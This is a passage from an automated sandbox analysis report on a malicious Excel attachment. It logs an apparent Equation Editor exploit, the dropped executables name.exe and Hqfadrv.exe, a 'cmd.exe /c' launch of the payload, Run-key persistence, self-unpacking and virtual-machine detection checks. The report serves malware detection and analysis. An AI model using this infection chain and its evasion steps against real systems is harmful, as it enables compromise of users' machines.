                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 11_2_0041A4BE
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 11_2_00418244
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 11_2_00401650
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 11_2_00402F20
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 11_2_004193C4
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 11_2_00418788
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 11_2_00402F89
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 11_2_00402B90
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 11_2_004073A0
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 11_2_002D1040
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 11_1_00408C60
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 11_1_0040DC11
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 11_1_00407C3F
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 11_1_00418CCC
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 11_1_00406CA0
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 11_1_004028B0
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 11_1_0041A4BE
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 11_1_00418244
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 11_1_00401650
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 11_1_00402F20
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 11_1_004193C4
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 11_1_00418788
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 11_1_00402F89
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 11_1_00402B90
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 11_1_004073A0
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: String function: 00406A00 appears 61 times
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: String function: 0040D606 appears 48 times
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: String function: 0040E1D8 appears 88 times
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: String function: 00404374 appears 99 times
                      Source: C:\Users\Public\name.exeCode function: String function: 0040D606 appears 48 times
                      Source: C:\Users\Public\name.exeCode function: String function: 0040E1D8 appears 88 times
                      Source: lxpo[1].exe.2.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                      Source: name.exe.2.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                      Source: Hqfadrv.exe.6.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                      Source: C:\Users\user\AppData\Local\afqH.url, type: DROPPEDMatched rule: Methodology_Shortcut_HotKey author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
                      Source: C:\Users\user\AppData\Local\afqH.url, type: DROPPEDMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
                      Source: C:\Users\user\AppData\Local\afqH.url, type: DROPPEDMatched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
                      Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@12/5@11/3
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 10_2_004286D0 GetLastError,FormatMessageA,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 10_2_00408FB2 GetDiskFreeSpaceA,
                      Source: C:\Users\Public\name.exeCode function: 7_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,
                      Source: C:\Users\Public\name.exeCode function: 7_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$SpecificationX20202611.xlsxJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD75B.tmpJump to behavior
                      Source: C:\Users\Public\name.exeCommand line argument: 08A
                      Source: C:\Users\Public\name.exeCommand line argument: 08A
                      Source: C:\Users\Public\name.exeCommand line argument: 08A
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCommand line argument: 08A
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCommand line argument: 08A
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCommand line argument: 08A
                      Source: C:\Users\Public\name.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\Public\name.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\Public\name.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\Public\name.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Users\Public\name.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Users\Public\name.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\Public\name.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\Public\name.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\Public\name.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: SpecificationX20202611.xlsxVirustotal: Detection: 62%
                      Source: SpecificationX20202611.xlsxReversingLabs: Detection: 53%
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\name.exe
                      Source: unknownProcess created: C:\Users\Public\name.exe C:\Users\Public\name.exe
                      Source: unknownProcess created: C:\Users\Public\name.exe C:\Users\Public\name.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe 'C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe'
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe 'C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe'
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\name.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\name.exe C:\Users\Public\name.exe
                      Source: C:\Users\Public\name.exeProcess created: C:\Users\Public\name.exe C:\Users\Public\name.exe
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe
                      Source: C:\Users\Public\name.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: SpecificationX20202611.xlsxInitial sample: OLE zip file path = xl/embeddings/oleObject1.bin
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: Binary string: _.pdb source: name.exe, 00000007.00000002.2352654865.0000000001EE2000.00000004.00000001.sdmp, Hqfadrv.exe, 0000000B.00000002.2351863459.0000000000450000.00000004.00000001.sdmp
                      Source: SpecificationX20202611.xlsxInitial sample: OLE indicators vbamacros = False

                      Data Obfuscation:

                      barindex
                      Detected unpacking (changes PE section rights)Show sources
                      Source: C:\Users\Public\name.exeUnpacked PE file: 7.2.name.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeUnpacked PE file: 11.2.Hqfadrv.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                      Detected unpacking (overwrites its own PE header)Show sources
                      Source: C:\Users\Public\name.exeUnpacked PE file: 7.2.name.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeUnpacked PE file: 11.2.Hqfadrv.exe.400000.0.unpack
                      Source: C:\Users\Public\name.exeCode function: 7_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,
                      Source: C:\Users\Public\name.exeCode function: 7_2_0041C40C push cs; iretd
                      Source: C:\Users\Public\name.exeCode function: 7_2_00423149 push eax; ret
                      Source: C:\Users\Public\name.exeCode function: 7_2_0041C50E push cs; iretd
                      Source: C:\Users\Public\name.exeCode function: 7_2_004231C8 push eax; ret
                      Source: C:\Users\Public\name.exeCode function: 7_2_0040E21D push ecx; ret
                      Source: C:\Users\Public\name.exeCode function: 7_2_0041C6BE push ebx; ret
                      Source: C:\Users\Public\name.exeCode function: 7_2_003E4F7B push edi; ret
                      Source: C:\Users\Public\name.exeCode function: 7_2_003E4FBB push es; ret
                      Source: C:\Users\Public\name.exeCode function: 7_1_0041C40C push cs; iretd
                      Source: C:\Users\Public\name.exeCode function: 7_1_00423149 push eax; ret
                      Source: C:\Users\Public\name.exeCode function: 7_1_0041C50E push cs; iretd
                      Source: C:\Users\Public\name.exeCode function: 7_1_004231C8 push eax; ret
                      Source: C:\Users\Public\name.exeCode function: 7_1_0040E21D push ecx; ret
                      Source: C:\Users\Public\name.exeCode function: 7_1_0041C6BE push ebx; ret
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 10_2_004487E8 push 00448875h; ret
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 10_2_0043E078 push ecx; mov dword ptr [esp], ecx
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 10_2_0046C0AC push 0046C0D8h; ret
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 10_2_0040E11C push 0040E298h; ret
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 10_2_00464240 push 004642BDh; ret
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 10_2_0044A25C push 0044A288h; ret
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 10_2_004302DC push 0043031Ah; ret
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 10_2_0040E29A push 0040E30Bh; ret
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 10_2_0040E29C push 0040E30Bh; ret
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 10_2_0043035C push 00430394h; ret
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 10_2_00430324 push 00430350h; ret
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 10_2_004223E4 push ecx; mov dword ptr [esp], edx
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 10_2_00452434 push 0045249Fh; ret
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 10_2_00424498 push ecx; mov dword ptr [esp], edx
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 10_2_0042E568 push 0042E638h; ret
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 10_2_00406534 push 00406585h; ret
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 10_2_004685D0 push 00468652h; ret
                      Source: C:\Users\Public\name.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeJump to dropped file
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lxpo[1].exeJump to dropped file
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\name.exeJump to dropped file
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\name.exeJump to dropped file

                      Boot Survival:

                      barindex
                      Drops PE files to the user root directoryShow sources
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\name.exeJump to dropped file
                      Source: C:\Users\Public\name.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run HqfaJump to behavior
                      Source: C:\Users\Public\name.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run HqfaJump to behavior
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 10_2_0045C7F8 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 10_2_00442998 IsIconic,GetCapture,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 10_2_0042ED6C IsIconic,GetWindowPlacement,GetWindowRect,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 10_2_0045CF14 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 10_2_0045CFC4 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 10_2_0044324C IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 10_2_0045973C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 10_2_00443B44 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 10_2_004481B8 SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\name.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\name.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\name.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\name.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\name.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\name.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\name.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\name.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\name.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\name.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\name.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\name.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\name.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\name.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\name.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\name.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\name.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\name.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\name.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\name.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\name.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\name.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\name.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\name.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\name.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\name.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\name.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\name.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\name.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\name.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\name.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\name.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\name.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\name.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\name.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: SpecificationX20202611.xlsxStream path '\x1OlE10NatiVE' entropy: 7.99580138608 (max. 8.0)

                      Malware Analysis System Evasion:

                      barindex
                      Contains functionality to detect sleep reduction / modificationsShow sources
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 10_2_0043789C
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\Public\name.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Users\Public\name.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                      Source: C:\Users\Public\name.exeCode function: 7_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,
                      Source: C:\Users\Public\name.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\Public\name.exeWindow / User API: threadDelayed 1289
                      Source: C:\Users\Public\name.exeWindow / User API: threadDelayed 8489
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 10_2_0043789C
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2836Thread sleep time: -300000s >= -30000s
                      Source: C:\Users\Public\name.exe TID: 2840Thread sleep time: -300000s >= -30000s
                      Source: C:\Users\Public\name.exe TID: 3060Thread sleep count: 48 > 30
                      Source: C:\Users\Public\name.exe TID: 3060Thread sleep time: -44272185776902896s >= -30000s
                      Source: C:\Users\Public\name.exe TID: 3060Thread sleep time: -120000s >= -30000s
                      Source: C:\Users\Public\name.exe TID: 2980Thread sleep count: 1289 > 30
                      Source: C:\Users\Public\name.exe TID: 3008Thread sleep count: 8489 > 30
                      Source: C:\Users\Public\name.exe TID: 3060Thread sleep time: -119628s >= -30000s
